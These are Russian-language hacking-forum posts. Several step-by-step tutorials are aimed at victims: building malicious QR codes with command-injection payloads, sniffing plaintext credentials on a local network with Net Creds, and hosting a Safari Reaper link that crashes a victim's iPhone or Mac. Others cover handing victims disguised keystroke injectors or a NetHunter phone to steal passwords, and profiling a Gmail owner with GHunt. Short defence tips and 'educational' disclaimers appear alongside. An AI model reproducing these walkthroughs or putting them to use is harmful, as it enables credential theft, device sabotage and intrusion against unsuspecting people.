Для установки шпионских приложений требуется либо физический доступ, либо невнимательность пользователя. Обязательно установите хороший пароль для вашего устройства, который не так-то просто взломать. Убедитесь, что вы не переходите по неизвестным ссылкам и не загружаете приложения из браузера.

Проведите чистку приложений с вашего устройства. Удалите все неизвестные приложения или те, которыми вы не пользуетесь.

И последнее, но не менее важное: перезагрузите устройство, если вы не можете удалить вирус или обнаружить шпионское ПО. Если ничего из вышеназванного не помогло, то попробуйте сделать резервную копию всех файлов, предварительно просканировав их антивирусом. Не создавайте резервные копии приложений. Сохраните только самое важное, а затем сбросьте устройство до заводских установок. Этот способ всегда работает.

А на этом все. Удачи!

https://i.gyazo.com/55832d5db4c558d972b56cd5f8da9080.jpg

Вступить в наш чат

QR-коды используются во всем мире, начиная от хранения данных и заканчивая отправкой и получением платежной информации. Но так ли они безопасны, как все утверждают? Могут ли быть вредоносные QR-коды? И возможен ли взлом QR-кодов? Что ж, правда в том, что QR-коды могут легко могут ввести человека в заблуждение и оказаться фальшивкой. В отличие от вредоносных программ и фишинговых ссылок, вредоносные QR-коды неразличимы невооруженным глазом. Любой пользователь самостоятельно может создать любой QR-код, начинённый вредоносным ПО. Мы покажем вам, как именно взломать устройства с помощью QR-кодов.

https://i.gyazo.com/fb0f867d64c8efc758ef801cf6133c4e.jpg

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.

Что такое QR-код?

QR (от английского Quick Response, «быстрый отклик») — это штрих-код, который легко считывается цифровым устройством и хранит информацию в виде серии пикселей в квадратной сетке. При сканировании QR-кода пользователь тотчас получает доступ к этим данным.

До появления QR-кодов использовались линейные штрих-коды, в которых данные хранились в строках. Затем с годами QR-коды становились все сложнее и сложнее.

https://i.gyazo.com/ea09b76164102e2be402671af205e434.jpg

Код первого поколения

https://i.gyazo.com/ac112d81ef0b0538884a0e26532893bc.jpg

Второе поколение

Как видно из изображений, сложность QR-кодов увеличилась, как и количество данных, которые они могут содержать. Сейчас один QR-код может содержать до 4296 символов ASCII. Хотя это может показаться не таким уж большим количеством, но этого зачастую предостаточно для хранения важной информации.

Поскольку нельзя на первый взгляд отличить вредоносный QR-код от обычного, пользователям становится все сложнее защититься от вирусов и взломов. Не говоря уже о том, что для QR-кодов нет антивирусных программ.

Итак, приступим к взлому Qr-кодов.

Мы будем проверять два разных типа атак:

Взлом с помощью QR GEN;

Создание вредоносных QR-кодов с помощью QRGEN.

Хакинг с помощью QR-кодов

Инструмент для взлома, который мы будем использовать сегодня, называется QR GEN. Это инструмент Python, который может помочь нам создавать вредоносные QR-коды. У него также есть много готовых эксплойтов, которые мы можем использовать в своих интересах.

Python по умолчанию установлен в Linux. Если вы используете другую ОС, вам придется установить Python.

Шаг 1: Клонирование инструмента

Клонируйте репозиторий Github с помощью следующей команды:

git clone https://github.com/h0nus/QRGen

Шаг 2: Теперь введите следующие команды:

cd QRGen

ls

Шаг 3: Теперь установите все требования к программному обеспечению для этого инструмента:

pip3 install -r requirements.txt

Шаг 4: Если это не сработало, используйте эту альтернативную команду:

python3 -m pip install -r requirements.txt

Шаг 5: Теперь запустите скрипт, набрав:

python3 qrgen.py

https://i.gyazo.com/ca103b06a86c7c9852c8aab1b0e9e95a.jpg

Как видите, инструмент способен на многое.

Шаг 6: В QR GEN доступны следующие готовые эксплойты:

https://i.gyazo.com/b0e41b9cdf879af27c1c34d1e963407c.jpg

Шаг 7: Мы выберем один из них. Итак, вариант 2: Внедрение команд. Мы будем использовать следующую команду, чтобы выбрать свой вариант: python3 qrgen.py -l 2. После чего будет сгенерирована группа QR-кодов, которые будут сохранены в зеленой папке.

Введите следующие команды, чтобы перейти в каталог:

cd genqr

ls

https://i.gyazo.com/9383e360311d27406fc98b59272abe8a.jpg

Или просто откройте папку QR gen. Как вы видите, у каждого из этих кодов есть скрытая команда. Вы можете затестить их с помощью мобильного сканера. QR-код генерируется автоматически и имеет скрытую команду.

https://i.gyazo.com/4e232c6f189a86875e338c7c81140396.jpg

Но что делать, если вы хотите создать собственную начинку для QR-кода?

Секретный метод: создание пользовательского QR-кода

Шаг 1: Чтобы закодировать собственный QR-код, нам сначала нужно создать текстовый файл в папке QRGen:

cd QRGen

nano exploit.txt

Шаг 2: В этот текстовый файл мы можем поместить любую начинку, в том числе фишинговый URL. Для наглядности мы будем использовать фейсбук.

www.facebook.com

https://i.gyazo.com/27c27b913db941a6f5a5f2db51582c02.jpg

Шаг 3: Мы можем сохранить файл, нажав Control X, и затем Y и Enter, чтобы подтвердить сохранение. Теперь вы можете увидеть текстовый файл. Введите ls для подтверждения:

ls

Шаг 4: Чтобы записать информацию в QR-код, нам нужно ввести следующее:

cd

python3 qrgen.py -w '/username/QRGen/genqr/exploit.txt'

Кроме того, файл txt должен находиться в каталоге QRGen.

https://i.gyazo.com/4a33f367216ad39fcf71c17430963867.jpg

Шаг 5: Для нашего URL-адреса facebook.com, инструмент сгенерировал приведенный ниже QR-код. Вы можете найти его в папке QRGen.

https://i.gyazo.com/2a33baaa4092722161f139b687ef887c.jpg

Поздравляем! Ваш персональный QR-код готов.

Заключение

Сканирование QR-кодов без знания того, что они в себе скрывают, может привести к катастрофе. Эти вредоносные QR-коды могут заставить пользователя посетить фишинговые страницы, загрузить вирусы и подорвать безопасность любого пользователя. Многие приложения для сканирования напрямую открывают коды, не проверяя их содержимое. А некоторые даже выполняют команды. Так что впредь с осторожностью относитесь к любым сомнительным QR-кодам. В следующий раз, когда будете их сканировать, задайтесь вопросом: «Безопасно ли это?». И если вы сомневаетесь, то оставьте эту затею.

https://i.gyazo.com/0189259c943f696ff78e84b6c041fb86.jpg

Вступить в наш чат

Если вы не слышали о сниффинге, то не беспокойтесь, сейчас мы вам все расскажем. Это не какой-то секретный хакерский инструмент, а обычная программа для перехвата паролей и хэшей на основе Python. В этом статье мы научим вас, как использовать Net Creds и запустить атаку в вашей локальной сети. Как вы можете догадаться, этот хак не работает через Интернет, а только локально, т.е. и вы, и потенциальная жертва должны быть в одной сети, чтобы этот взлом сработал.

Что такое сниффинг

Ранее мы уже подробно разбирали, что такое сниффинг, его виды и как защититься от него. Если вы не ознакомились с этой статей, то переходите по ссылке (https://forum.antichat.xyz/threads/750994/post-329637).

https://i.gyazo.com/f0d920943d0596167ec6151e6a814118.gif

Сниффинг — (от англ. sniff - нюхать) — это процесс мониторинга и кражи данных с помощью отслеживания сетевой активности и сбора персональной информации о пользователях. Изначально снифферы предназначались для использования сетевыми администраторами для устранения неполадок подозрительного трафика. Однако, в настоящее время хакеры используют снифферы для перехвата пакетов данных, содержащих конфиденциальную информацию, такую как пароли, логины и т. д.

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.

Сниффим с помощью Net Creds

Поскольку в Kali Linux по умолчанию есть все необходимое для взлома, сам процесс сниффинга значительно упрощается.

Шаг 1: Клонируем инструмент для перехвата паролей

В Kali вы можете просто использовать следующую команду для загрузки Net Creds:

git clone https://github.com/DanMcInerney/net-creds

https://i.gyazo.com/d14557475c3b334dcb8c95071f1e3b15.jpg

Шаг 2: Запуск терминала Kali Linux

Измените каталог, написав в терминале:

cd net-creds

Чтобы начать сниффинг-атаку запустите сценарий net Creds с помощью следующей команды:

python net-creds.py -i eth0

Вам нужно выбрать правильный интерфейс, в нашем случае мы использовали -i eth0 в качестве своего интерфейса.

https://i.gyazo.com/8f64f1b791c617a9a502f2bb9b14914a.jpg

Шаг 3: Подождите, пока жертва войдет в систему

Когда жертва заходит на незащищенный веб-сайт, который отправляет пароли в виде простого текста, пароль будет перехвачен, и хакер легко взломает учетные записи.

На скриншоте показаны перехваченные данные в формате запроса GET и POST протокола HTTP. Анализируя этот трафик, мы можем легко увидеть простой текстовый пароль. Эта атака будет работать только с сайтами, имеющими HTTP-трафик.

Команды для Net Creds

Автоматическое определение интерфейса для сниффинга:

sudo python net-creds.py

Выберите eth0 в качестве интерфейса:

sudo python net-creds.py -i eth0

Игнорировать пакеты 192.168.0.2:

sudo python net-creds.py -f 192.168.0.2

Чтение из захваченного файла pcap:

python net-creds.py -p pcapfile

Возможности net-creds для перехвата паролей

Net Creds — это, действительно, мощный хакерский инструмент, потому что он может перехватывать протоколы непосредственно из сетевого интерфейса или из файла PCAP и раскрывать всю конфиденциальную информацию, передаваемую через Интернет.

Посещенные URL-адреса;

POST-загрузки, отправленные по сети;

Используемые логины/пароли HTTP;

Настройка логинов/паролей базовой аутентификации HTTP;

Логины/пароли FTP в текстовом виде;

Логины/пароли IRC в текстовом виде;

Логины/пароли POP в текстовом виде;

Перехваченные логины/пароли IMAP;

Логины/пароли Telnet;

Логины/пароли SMTP;

NTLMv1/v2 все поддерживаемые протоколы: HTTP, SMB, LDAP и т. д.

Kerberos.

Как предотвратить снифф-атаку

1. Первая защита от снифферов — это надежная реализация безопасности на уровне веб-сайта. Сайт должен иметь https-сертификат. Таким образом, трафик всегда шифруется, даже если злоумышленник получит данные, ему будет трудно их расшифровать.

2. Антисниффер и антивирус для обнаружения использования снифферов в вашей сети.

3. Регулярные обновления операционной системы и браузеров.

4. Использование только безопасных сайтов.

На этом все. Надеемся, что данная статья была полезной. Удачи!

https://i.gyazo.com/92590228fb4512108ecc5beb61932aec.jpg

Вступить в наш чат

Kali Linux — это специально разработанная ОС для сетевых аналитиков, пентестеров или, проще говоря, для тех, кто работает в сфере кибербезопасности и анализа. Иногда нам приходится автоматизировать наши задачи при тестировании на проникновение или взломе, работать вручную — сложная и нецелесообразная задача, поэтому мы используем инструменты, которые поставляются в комплекте с Kali Linux. Эти инструменты не только экономят наше время, но и собирают точные данные и дают конкретный результат. Kali Linux поставляется с более чем 350 инструментами, разобраться и отсортировать самое необходимое — непосильная работа для новичка. В этой статье мы собрали для вас топ лучших инструментов Kali Linux, которые могут сэкономить вам много времени и усилий. Поехали!

https://i.gyazo.com/a9d5a73ee64e13a54e0c82c90d7a0ca3.jpg

1. Nmap

Nmap — это сетевой сканер с открытым исходным кодом, который используется для разведки/сканирования сетей. Он используется для обнаружения хостов, портов и служб вместе с их версиями в сети. Он отправляет пакеты на хост, а затем анализирует ответы, чтобы получить желаемые результаты. Его можно даже использовать для обнаружения хостов, обнаружения операционной системы или сканирования открытых портов. Это один из самых популярных разведывательных инструментов. Чтобы использовать nmap:

Пропингуйте хост с помощью команды ping, чтобы получить IP-адрес:

ping hostname

Откройте терминал и введите там следующую команду:

nmap -sV ipaddress

Замените IP-адрес на IP-адрес хоста, который вы будете сканировать.

Он будет отображать все захваченные данные хоста.

https://i.gyazo.com/1e1c846549537f8e8b5ad6c26ac5f3c8.png

https://i.gyazo.com/ec80f641a17bfb7f7051da159a63b865.png

2. Burp Suite

Burp Suite — одна из самых популярных программ для тестирования безопасности веб-приложений. Она используется как прокси, поэтому все запросы от браузера с прокси проходят через неё. И когда запрос проходит через пакет burp, он позволяет нам вносить изменения в эти запросы в соответствии с нашими потребностями, что хорошо для тестирования уязвимостей, таких как XSS или SQLi, или даже любой уязвимости, связанной с Интернетом. Kali Linux поставляется с версией burp suite, которая бесплатна, но есть и платная версия этого инструмента, известная как проф. версия, которая имеет гораздо больше функций. Чтобы использовать burp suite:

Откройте терминал и наберите там «burpsuite».

Перейдите на вкладку «Прокси» и включите режим перехватчика.

Теперь перейдите на любой URL-адрес, и можно будет увидеть, что запрос перехвачен.

https://i.gyazo.com/5e6af54fd75bb8b023c99d9b51a6e5c3.png

3. Wireshark

Wireshark — это инструмент сетевой безопасности, используемый для анализа или работы с данными, отправляемыми по сети. Он используется для анализа пакетов, передаваемых по сети. Эти пакеты могут содержать такую информацию, как IP-адрес источника и IP-адрес назначения, используемый протокол, и другие данные. Пакеты обычно имеют расширение «.pcap», которое можно прочитать с помощью инструмента Wireshark. Чтобы использовать Wireshark:

Откройте Wireshark и загрузите демо-файл pcap отсюда.

Нажмите «ctrl + o», чтобы открыть файл pcap в wireshark.

Теперь вы можете заметить, что он отображает список пакетов вместе с их заголовками.

https://i.gyazo.com/2eb54512dcbc210708cd040b6c7c4d79.png

4. Metasploit Framework

Metasploit — это инструмент с открытым исходным кодом, разработанный технологиями Rapid7. Это одна из наиболее часто используемых в мире сред тестирования на проникновение. Инструмент поставляется с множеством эксплойтов для использования уязвимостей в сети или операционных системах. Metasploit обычно работает в локальной сети, но мы можем использовать Metasploit для хостов через Интернет, используя «переадресацию портов». По сути, Metasploit — это инструмент на основе командной строки, но у него даже есть пакет с графическим интерфейсом под названием «armitage», который делает использование Metasploit ещё более удобным.

Metasploit предустановлен вместе с Kali Linux.

Просто введите «msfconsole» в терминале.

https://i.gyazo.com/8f902b49f61be903f016cdc988d964ca.png

5. Aircrack-ng

Aircrack — это комплексный анализатор пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и захвата хэшей. Также он используется для взлома Wi-Fi. Он поддерживает практически все новейшие беспроводные интерфейсы. Чтобы использовать aircrack-ng:

aircrack-ng уже автоматически установлен с Kali Linux.

Просто введите aircrack-ng в терминале, чтобы использовать его.

https://i.gyazo.com/7fc38caeee15cc236677d40a4c95f59f.png

Заключение

Это далеко не все лучшие инструменты, доступные в Kali Linux. В следующей части мы продолжим освещать эту тему, дополнив нашу подборку. А на этом все, надеемся, что вы открыли для себя раннее неизвестные инструменты, которые могут пригодится вам в работе. Удачи в использовании и до новых встреч!

https://i.gyazo.com/16c385b7f41cc3b6f1cfafdea45b04d6.jpg

Вступить в наш чат

Сегодня мы продолжим рассказывать про топ-10 лучших инструментов, которые значительно облегчат вашу работу с Kali. Если вы еще не ознакомились с нашей прошлой статьей, то переходите по ссылке (https://forum.antichat.xyz/threads/750994/post-331090).

А мы начинаем.

https://i.gyazo.com/a9d5a73ee64e13a54e0c82c90d7a0ca3.jpg

Netcat

Netcat — это сетевой инструмент, используемый для работы с портами и выполнения таких действий, как сканирование, прослушивание и перенаправление портов. Он даже используется для сетевой отладки или тестирования сетевого демона. Его принято считать швейцарским армейским ножом среди всех сетевых инструментов. Netcat можно также использовать для выполнения операций, связанных с TCP, UDP или UNIX, для открытия удаленных соединений и многого другого.

Netcat поставляется с Kali Linux, поэтому просто введите «nc» или «netcat» в терминале, чтобы его использовать.

Чтобы выполнить прослушивание порта, введите следующие команды в 2 разных терминалах:

nc -l -p 1234

nc 127.0.0.1 1234

https://i.gyazo.com/aaf008314253e0d962d1f21bb01a6fa0.gif

John the Ripper

John — отличный инструмент для взлома паролей с использованием известной брутфорс-атаки как по словарю, так и по пользовательскому списку слов. Помимо этого, инструмент используется для взлома хэшей и паролей для заархивированных и даже заблокированных файлов.

John the ripper предустановлен в Kali Linux. Просто введите «john» в терминале, чтобы использовать инструмент.

https://i.gyazo.com/39ad8a39a9ec34f2778177e664cf66cd.png

Sqlmap

Sqlmap — один из лучших инструментов для выполнения атак путем внедрения SQL. Он автоматизирует процесс тестирования параметра на SQL-инъекцию и процесс эксплуатации уязвимого параметра. Это отличный инструмент, поскольку он сам определяет базу данных, поэтому нам просто нужно предоставить URL-адрес, чтобы проверить, является ли параметр в URL-адресе уязвимым или нет, мы даже можем использовать запрошенный файл для проверки параметров POST.

sqlmap предустановлен в Kali Linux, поэтому просто введите sqlmap в терминале, чтобы начать им пользоваться.

https://i.gyazo.com/4787a7ec0b3fbc6142d81555fb899b39.png

Autopsy

Autopsy - это инструмент цифровой криминалистики, который используется для сбора информации или, другими словами, для исследования файлов или журналов, чтобы узнать, что именно было сделано с системой. Его можно даже использовать в качестве программного обеспечения для восстановления файлов с карты памяти или флешки.

Autopsy предустановлена в Kali Linux.

Просто введите «autopsy» в терминале.

https://i.gyazo.com/da3a30900c5a264929ad4ada6647db87.png

Теперь перейдите по ссылке, чтобы начать им пользоваться.

https://i.gyazo.com/a0d605d032361910f91099eefaaa54e1.png

Social Engineering Toolkit

Social Engineering Toolkit - это набор инструментов, которые можно использовать для выполнения атак социальной инженерии. Эти инструменты используют и манипулируют поведением человека для сбора информации. Идеально подойдёт для фишинга.

Social Engineering Toolkit предустановлен вместе с Kali Linux.

Просто введите «setoolkit» в терминале.

Согласитесь с условиями, чтобы начать использование.

https://i.gyazo.com/e86295311a13d36f683b0ce2c5cd6b47.png

Заключение

Kali Linux имеет в своём арсенале более 350 инструментов. Вам потребуется куча времени и сил, чтобы разобраться во всем этом многообразии, именно поэтому мы собрали для вас самые необходимые и действенные инструменты, которые обязательно автоматизируют и облегчат вашу работу. Надеемся, что данная подборка оказалась полезной для вас. А мы желаем вам удачи!

https://i.gyazo.com/afadde9946f6e16f74452490667d3449.jpg

Вступить в наш чат

Вы хотите узнать, как хакеры взламывают андроиды или вы забыли свой пароль и не можете разблокировать телефон, тогда вы попали в нужное место. Мы подготовили подробный мануал из трёх способов, которые помогут вам разблокировать Android.

https://i.gyazo.com/955e2fa4a127425bc3876d338d640a85.png

Перед началом убедитесь, что вы сделали резервную копию всех данных вашего телефона:

1. Подключите ваше устройство к компьютеру;

2. Найдите свой телефон и откройте;

3. Скопируйте все папки, которые вы хотите сохранить на локальный диск.

Теперь мы готовы начать. Итак, поехали.

Метод №1 – Как разблокировать телефон с помощью пароля учетной записи Google

Что вам потребуется:

• Ваш Android;

• Доступ к аккаунту Google, который вы синхронизировали на этом устройстве.

Этот метод использует вашу собственную учетную запись Google Recovery для разблокировки телефона Android.

Примечание: Если у вас нет доступа к исходной учетной записи Google, вместо этого вы можете сразу перейти к методу №3.

А в этом способе все очевидно. Выбираем опцию «забыли пароль».

https://i.gyazo.com/3b3bfb9a0833bd1be281063fc0e2e618.jpg

Далее откроется скрытое меню, где вам нужно выбрать «Разблокировка учетной записи Google». И после ввести данные своей учетной записи Google.

Готово. Ваш телефон разблокирован. Теперь просто установить новый пароль.

Способ №2 – Как разблокировать устройство Samsung

Это специальный метод, предназначенный только для пользователей телефонов Samsung, который также используется хакерами для взлома телефонов.

Что понадобится:

• Устройство Samsung;

• Ваша учетная запись Samsung;

• Ноутбук или ПК.

Примечание: Этот метод работает только со смартфонами Samsung.

1. Откройте официальный веб-сайт Samsung на своем ПК и войдите в свою учетную запись Samsung.

https://i.gyazo.com/a449aa706e91015b2a36eb42632a4ee0.jpg

2. Выберите свое устройство Android на панели задач слева.

3. Найдите параметр «Разблокировать мой экран» на боковой панели и выберите его. Готово, ваше устройство будет разблокировано.

Метод №3 – Как разблокировать телефон с помощью обходных приложений

Приложение, которое мы будем использовать, называется dr. fone от Wondershare. Оно может обходить блокировки Android, PIN-коды, пароли и даже отпечатки пальцев без какой-либо потери данных.

Примечание: Этот метод работает не на всех устройствах андроид, поэтому лучше проверить веб-сайт разработчиков на наличие всех поддерживаемых устройств, чтобы увидеть, есть ли ваш телефон в этом списке.

1. Скачайте dr.fone с сайта разработчиков.

https://i.gyazo.com/393810767b88604bf3563752c0fbedb2.jpg

2. Запустите приложение на своем ПК и нажмите кнопку Разблокировать.

https://i.gyazo.com/ca8c3ba6102cebb4a68fd1e073b2ce18.jpg

3. Теперь подключите телефон Android к компьютеру с помощью USB-кабеля. После успешного подключения нажмите «Пуск».

https://i.gyazo.com/1d4a4f8db59ffd92d8857f6b6dffea75.jpg

4. Если ваш телефон успешно подключен, на экране должна появиться информация о нем. Если все верно, то нажмите «Далее».

5. Выберите режим восстановления, а затем загрузите пакет восстановления.

6. Как только это будет сделано, начнется процесс удаления пароля, и после его завершения на экране появится подтверждающее сообщение.

https://i.gyazo.com/73913a6666e73178b6d7d851bf39595a.jpg

Теперь перезагрузите телефон и пользуйтесь устройством.

На это все. Надеемся, что данная статья была полезной для вас. Удачи!

https://i.gyazo.com/e9a4ee01c636dd12cf29a7d03e937da4.jpg

Вступить в наш чат

Существует огромное количество хакерских устройств, способных облегчить работу. Хорошему хакеру, как и настоящему рок-н-рольщику, необходимо все и сразу. Взлом — это процесс использования различных видов инструментов, и вы никогда не знаете, что вам может понадобиться следующим, поэтому нужное приспособление под рукой никогда не будет лишним. В этой статье мы поделимся 5 лучшими устройствами, которые должен взять на вооружение каждый начинающий хакер.

https://i.gyazo.com/c0cac6bdc89864d4676b769f25cea49c.jpg

1.Keystroke Injectors

https://i.gyazo.com/13a0b8a215baa5d57fbca7476328d3d5.jpg

Это устройство представляет собой простую флешку, которая при подключении к компьютеру определяется как клавиатура. В результате вы можете сделать следующее:

Загрузить и запустить вредоносное ПО из Интернета;

Выполнить системные команды;

Создать обратную оболочку;

Украсть пароли и другие данные.

Все зависит от того, как вы используете и управляете инжектором. Лучшее в этом устройстве то, что оно работает невидимо для ПК.

Итак, если вы хотите атаковать цель, просто возьмите это устройство и под видом флешки отдайте жертве. Вы можете придумать различные сценарии, при этом остаться незамеченным.

2.Hardware Keyloggers

https://i.gyazo.com/96d666829cc290eab58ddff162e94a14.jpg

Ещё одно, с виду неприметное, устройство, которое может стать настоящим хакерским оружием. Кейлоггер, при подключении к ПК, способен записывать каждое нажатие клавиши, которое жертва набирает на клавиатуре. Есть 2 вида таких устройств: у обычных аппаратных кейлоггеров есть внутреннее хранилище, тогда как профессиональная версия имеет облачную систему, которая будет хранить все нажатия клавиш, доступ к которым вы можете получить удалённо в любое время и в любом месте.

3. Wireless Adapter

https://i.gyazo.com/36873d10b292a0ddc06f2471c616f88f.jpg

Большинство компьютеров поставляются со встроенным беспроводным адаптером, но это не то же самое, что нужно нам для взлома. Вы не можете подключить их к виртуальным машинам, и большинство этих встроенных устройств не поддерживают внедрение пакетов, режим мониторинга или режим AP (режим точки доступа). Выбирать следует специальные Wi-Fi адаптеры для вардрайвинга(обнаружение и взлома точек Wi-Fi), которые поддерживаются Kali Linux. Такие адаптеры способны:

Собирать данные;

Перехватывать трафик;

Запускать свою собственную фальшивую сеть Wi-Fi или приманку.

Таким образом, эти беспроводные адаптеры способны на многое. Однако, важно отметить, что при покупке беспроводного адаптера не столько имеет значение бренд, как сами характеристики.

4. Android телефон с NetHunter

https://i.gyazo.com/66db09d0e3b1be29f0f54c9cfd43fd2a.jpg

NetHunter — это специальная Android версия, предназначенная для взлома. NetHunter поставляется с большим количеством полезных инструментов. Например, вы можете использовать его для запуска атак Keystroke Injection. Огромный плюс тандема андроид + NetHunter заключается в том, что для взлома ПК жертвы, вы можете просто сказать: «Мне нужно зарядить свой телефон, но я забыл зарядку». И в момент, когда жертва подключит ваш телефон к своему компьютеру, NetHunter может загрузить вредоносное ПО, украсть все сохраненные пароли, личные данные и многое другое, все будет зависеть от ваших целей. Кроме того, вы можете использовать NetHunter для выполнения атаки с подделкой DNS, MMIT (атака «человек посередине») и многого другого.

5. Raspberry Pi

https://i.gyazo.com/e8d03912130791adccc659c62f374b83.jpg

Это полноценный компьютер, но небольшого размера, Raspberry Pi 0 даже меньше кредитной карты. Все, что вы делаете на своем компьютере или ноутбуке, можно сделать здесь. Вы даже можете установить на него Kali Linux.

Он позволяет получить доступ к любой сети, просто подключите его к порту LAN, а после чего вы уже можете запускать любые инструменты, которые вы хотите: Nmap, Beef, Burp Suite, можно сниффить, изменять или красть данные. Его также можно использовать для запуска поддельных сетей Wi-Fi, приманок. С Raspberry Pi можно делать практически все.

Заключение

Количество хакерских атак растёт с каждым разом, как и сами способы, которое постоянно модернизируются и упрощаются. Так, любой пользователь с лёгкостью может стать жертвой злоумышленников, лишь подключив к своему компьютеру неизвестное USB-устройство или выбрав незащищенную Wi-Fi сеть. Поэтому всегда подумайте дважды, прежде чем предпринимать какие-либо шаги, ведь загнать себя в ловушку гораздо проще, чем вам кажется.

https://i.gyazo.com/b1d8e0129300727dc99056c2cd45f86a.jpg

Вступить в наш чат

Компания Apple зарекомендовала себя как лучшую на всем рынке. Что касается безопасности устройств, iOS всегда занимали первую позицию по сравнению с Android. Но действительно ли macOS и iOS настолько безопасны, как утверждает Apple? Забавно, что существует множество эксплойтов, которые способны за считанные секунды вывести iPhone и MacOS из строя. Итак, сегодня мы собираемся показать, как работает один из таких эксплойтов. Так что, если вы все ещё думаете, что Apple спасёт ваше устройство от взлома, то вынуждены вас огорчить. Скоро сами в этом убедитесь.

https://i.gyazo.com/cfa76d9e60df74c07ebf9609eeb14631.jpg

Используем готовую ссылку

Чтобы крякнуть iPhone и MacOS, мы будем использовать Safari Reaper Tool. Это бесплатный инструмент, который использует эксплойт браузера Safari для сбоя устройства, что в дальнейшем приводит к перезагрузке системы, т.е. к сбою всего устройства.

Если вам лень настраивать инструмент, просто используйте ссылку ниже.

Осторожно: не проверяйте на своём устройстве! Если перейдете по ссылке ниже, то ваша система перезапустится и выйдет из строя!

На свой страх и риск:

Ссылка: https://jonnybanana.github.io/safari...per.github.io/

Самостоятельно настраиваем ссылку в Kali Linux

Если же вы хотите настроить ссылку в своей системе, сделайте следующее:

Шаг 1: Клонируйте репозиторий на свой Kali Linux

git clone https://github.com/JonnyBanana/safar...aper.github.io

Шаг 2: После загрузки репозитория откройте папку, и вы увидите файлы.

Шаг 3: Скопируйте эти файлы в папку «var/www/html/».

https://i.gyazo.com/47c34e897a7b1691287486b214621081.jpg

Шаг 4: Запустите сервер kali с помощью следующей команды:

service apache2 start

Шаг 5: Ссылка готова. Теперь, как только жертва перейдёт по ней, в устройстве произойдёт сбой.

На этом все. Удачи!

https://i.gyazo.com/a64c945f89dc2d703ddb4fa44aafa02b.jpg

Вступить в наш чат

Термин «OSINT» или «разведка из открытых источников» означает поиск информации о цели. Существует множество методов, с помощью которых можно осуществить OSINT-разведку. В этой статье мы покажем, как просто и быстро извлечь много полезной информации о пользователе, зная лишь один адрес Gmail.

Многие люди используют почту Gmail, потому что она бесплатна и предоставляет бесплатное хранилище файлов на 15 ГБ. Однако, вы узнате, что получить доступ к информации Google проще простого, а поможет вам в этом инструмент под названием GHunt.

https://i.gyazo.com/e1c6cccb8d063079997b67b9a6d0c171.png

GHunt (v2) — это фреймворк Google, который в настоящее время ориентирован на OSINT.

Он имеет следующие особенности:

Использование CLI и модулей;

Использование библиотеки Python;

JSON-экспорт.

Вы можете установить GHunt на свой компьютер с Linux или в Google Cloud Console. Здесь же мы продемонстрируем вам, как установить его в Kali Linux.

Установка Ghunt:

Итак, во-первых, нам нужно установить Ghunt на нашу машину с Linux, но перед этим проверьте на наличие установщика Python 3. Откройте терминал и введите следующую команду для установки Ghunt:

git clone install https://github.com/mxrch/GHunt.git

После успешной установки нам теперь нужно запустить его. Заходим в каталог, где он установлен, с помощью команды «cd» (сменить каталог). В нашем случае команда следующая:

cd ghunt

Теперь, когда мы находимся в нашем каталоге GHunt, вы заметите файл с именем «requirements.txt». Это текстовый файл, содержащий все библиотеки и зависимости, необходимые для запуска GHunt. Чтобы установить все библиотеки сразу, введите следующую команду:

pip3 install -r requirements.txt

После успешной установки вам также необходимо установить:

pip3 install pipx

pipx ensurepath

pipx install ghunt

Все готово. Мы успешно установили GHunt на нашу машину с Linux. Теперь просто откройте новый терминал и введите следующую команду:

ghunt login

Далее Ghunt запросит некоторые файлы cookie, поэтому, чтобы получить файлы cookie, нам нужно будет установить расширение в нашем браузере — «Ghunt Companion». Есть две версии, одна для Firefox, другая для Chrome.

Загрузите Ghunt Companion по ссылке ниже в зависимости от используемого вами браузера:

Mozilla Firefox – ссылка

Google Chrome – ссылка

После установки расширения в браузере, вы должны войти в свою учетную запись Gmail (рекомендуем использовать для этой цели фейковую учетную запись, а не основную).

Вы увидите два метода: Выберите «Метод 2», чтобы автоматически скопировать файлы cookie в буфер обмена.

Затем вернитесь к своему терминалу и выберите вариант 2, а затем вставьте все выбранные файлы cookie.

https://i.gyazo.com/940714e3e85d20707b4ccaac78f3b135.jpg

Вот мы и закончили установку и настройку GHunt, давайте перейдём к Osint разведке.

Введите следующую команду, чтобы вывести список всех модулей.

ghunt -h

https://i.gyazo.com/d7cbff2f8c17d86b75c98e5cbcacc40a.jpg

Это основные возможности инструмента:

usage: ghunt [-h] {login,email,gaia,drive} ...

positional arguments:

{login,email,gaia,drive}

login Authenticate GHunt to Google.

email Get information on an email address.

gaia Get information on a Gaia ID.

drive Get information on a Drive file or folder.

Теперь давайте найдем некоторую информацию из идентификатора Gmail; для этого нам нужно ввести следующую команду:

ghunt email example@gmail.com

https://i.gyazo.com/dcb9d211ff130a555287677d204d0ec8.jpg

Мы использовали несколько случайных адресов электронной почты. И вот, что нам удалось найти: фото пользователя, Gaia ID и даже места, которые часто посещает наша цель. А еще отзывы, оставленные жертвой в Google Maps.

Заключение

GHunt может оказаться очень полезным инструментом для сбора информации для любого OSINTера. Стоит обратить внимание на то, что это никоим образом не является незаконным. OSINT - это совершенно легальный способ добычи информации, поскольку мы получаем ее из открытых источников, которые уже доступны в Интернете, а GHunt выступает в роли проводника, помогая нам собирать все эти данные в единое целое, облегчает работу и экономит время.

На этом все. Удачи в поисках!

https://i.gyazo.com/927ce340b5738fe77dce413bb0403f95.jpg

Вступить в наш чат

В этом году мы наблюдали за многими хакерскими группировками и увидели, что их число не только выросло, но и увеличилось количество и масштабность атак, которым они подвергли многие организации: массовые утечки данные, сбои в системах безопасности, кражи денежных средств и многое другое. В этой статье мы расскажем о самых страшных хакерских группировках, которые без угрызений совести готовы разрушить любую компанию.

Кто в этом году себя плохо вёл?

https://i.gyazo.com/c6100d74e72284b7a9b77ba56ea86c1a.jpg

1. Lapsus$

Эта группировка обычно использует аналогичные методы для нападения на технологические компании, и только в 2022 году она взломала Microsoft, Cisco, Samsung, NVIDIA и Okta.

Хакеры использовали тактику социальной инженерии, чтобы воспользоваться персональным устройством подрядчика Uber, зараженным вредоносным ПО. Они также взломали компанию Rockstar Games, занимающуюся видеоиграми, незаконно загрузили кадры грядущей игры Grand Theft Auto VI и выложили в сеть 90 видеоклипов из еще не вышедшей игры, получили доступ к внутренним привилегиям Uber, включая Google Docs и Slack.

